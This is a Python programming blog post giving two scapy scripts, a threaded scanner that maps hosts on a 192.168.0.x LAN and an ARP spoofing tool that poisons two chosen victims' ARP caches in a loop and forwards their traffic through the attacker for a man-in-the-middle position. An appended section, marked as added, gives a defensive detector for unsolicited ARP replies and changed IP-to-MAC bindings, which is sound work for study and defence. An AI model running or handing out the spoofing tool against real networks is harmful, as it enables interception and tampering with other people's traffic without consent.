  • ARP Spoofing
    Programming/Python 2018. 6. 28. 00:32

    <scan.py>
    from scapy.all import *
    import threading
    import os

    host_list = {}                   # num -> (ip, mac) for every host that answered
    num = 0
    threadLock = threading.Lock()    # guards num and host_list across threads
    threads = []

    def printHosts(host_list):
        print('-------------------------- HOST LIST --------------------------')
        print('NUM         IP                               MAC')
        print('---------------------------------------------------------------')
        for num in host_list:
            ip, mac = host_list[num]
            print("%d           %s                      %s" % (num, ip, mac))
        print('---------------------------------------------------------------')

    def sendARP(ip):
        global host_list, num
        # Broadcast a who-has request for this IP and collect any reply
        ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip), timeout=5, retry=1)
        for s, r in ans:
            threadLock.acquire()
            num = num + 1
            host_list.update({num: (ip, r.sprintf('%Ether.src%'))})
            threadLock.release()

    def scanHosts():
        # One thread per address in 192.168.0.1 - 192.168.0.255
        for i in range(1, 256):
            ip = "192.168.0.%d" % i
            th = threading.Thread(target=sendARP, args=(ip,))
            th.start()
            threads.append(th)

        # Wait for every probe to finish before printing the table
        for t in threads:
            t.join()

        os.system('clear')
        printHosts(host_list)
        return host_list


    <arp_spoofing.py>

    from scan import *
    from scapy.all import *
    import os

    def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
        # op=2 is an ARP reply; hwsrc is not set, so scapy fills in this machine's MAC
        arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
        arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic1_mac)
        send(arp1)
        send(arp2)

    def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
        # Re-announce the real IP-to-MAC bindings so both ARP caches recover
        arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
        arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
        send(arp1, count=3)
        send(arp2, count=3)

    def main():
        # Pick the two hosts by their NUM column in the scan table
        host_list=scanHosts()
        victim1=input("Victim 1 : ")
        victim2=input("Victim 2 : ")

        print("ARP Spoofing START")

        # fragrouter -B1 is plain IP forwarding between the two hosts
        os.system("fragrouter -B1")
        try:
            while True:
                arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
        except KeyboardInterrupt:
            # Ctrl+C: restore the original ARP entries before exiting
            restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
            print("ARP Spoofing END")

    if __name__=='__main__':
        main()
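
The replies built in arpSpoof() are ARP replies (op=2) that answer no request and that bind an IP already seen on the LAN to a different MAC, and a monitor can key on both properties. The detector below is an added example, not part of the original post; it parses raw frames with the standard library only, and its function names and sample addresses are constructed for illustration.

```python
import struct

ETH_ARP, OP_REQUEST, OP_REPLY = 0x0806, 1, 2

def build_arp(op, hwsrc, psrc, hwdst, pdst):
    """Build a raw Ethernet/ARP frame; used only to construct the sample input."""
    h = lambda m: bytes.fromhex(m.replace(':', ''))
    p = lambda a: bytes(int(x) for x in a.split('.'))
    eth = h(hwdst) + h(hwsrc) + struct.pack('!H', ETH_ARP)
    arp = struct.pack('!HHBBH', 1, 0x0800, 6, 4, op)
    return eth + arp + h(hwsrc) + p(psrc) + h(hwdst) + p(pdst)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip) for Ethernet/IPv4 ARP, else None."""
    header = struct.pack('!HHHBB', ETH_ARP, 1, 0x0800, 6, 4)  # ethertype, htype, ptype, hlen, plen
    if len(frame) < 42 or frame[12:20] != header:
        return None
    op = struct.unpack('!H', frame[20:22])[0]
    dotted = lambda b: '.'.join(map(str, b))
    return op, frame[22:28].hex(':'), dotted(frame[28:32]), dotted(frame[38:42])

def detect(frames):
    """Flag replies that answer no request and IPs whose claimed MAC changes."""
    bindings, pending, alerts = {}, set(), []
    for n, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, smac, sip, tip = parsed
        if op == OP_REQUEST:
            pending.add((sip, tip))          # sip asked "who has tip?"
        elif op == OP_REPLY and (tip, sip) in pending:
            pending.discard((tip, sip))      # answers an outstanding request
        elif op == OP_REPLY:
            alerts.append((n, 'unsolicited-reply', sip, smac))
        if bindings.setdefault(sip, smac) != smac:   # first MAC seen for an IP is the baseline
            alerts.append((n, 'binding-changed', sip, smac))
    return alerts

# Constructed sample capture; all addresses are made up.
GW, HOST, ODD = 'aa:aa:aa:00:00:01', 'aa:aa:aa:00:00:0a', 'de:ad:be:ef:00:66'
SAMPLE = [
    build_arp(OP_REQUEST, HOST, '192.168.0.10', 'ff:ff:ff:ff:ff:ff', '192.168.0.1'),
    build_arp(OP_REPLY, GW, '192.168.0.1', HOST, '192.168.0.10'),
    build_arp(OP_REPLY, ODD, '192.168.0.1', HOST, '192.168.0.10'),
    build_arp(OP_REPLY, ODD, '192.168.0.10', GW, '192.168.0.1'),
]

if __name__ == '__main__':
    print(*detect(SAMPLE), sep='\n')
```

The broadcast replies from restoreARP() are also unsolicited, so they raise the first alert as well; a legitimate address change (DHCP reassignment, NIC swap) raises the second, so alerts need to be checked against known inventory.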

